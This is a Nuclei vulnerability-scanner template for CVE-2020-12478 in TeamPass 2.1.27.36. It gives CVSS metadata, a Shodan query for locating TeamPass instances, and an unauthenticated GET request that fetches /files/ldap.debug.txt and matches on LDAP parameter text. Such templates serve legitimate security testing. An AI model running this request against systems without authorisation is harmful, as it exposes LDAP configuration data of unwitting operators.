nuclei-templates/cves/2020/CVE-2020-12478.yaml

44 lines
1.2 KiB
YAML

id: CVE-2020-12478
info:
name: TeamPass 2.1.27.36 - Improper Authentication
author: arafatansari
severity: high
description: |
TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/nilsteampassnet/TeamPass/issues/2764
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-12478
cwe-id: CWE-306
metadata:
shodan-query: http.html:"teampass"
verified: "true"
tags: cve,cve2020,teampass,exposure,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/files/ldap.debug.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Get all LDAP params'
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200
# Enhanced by md on 2023/02/01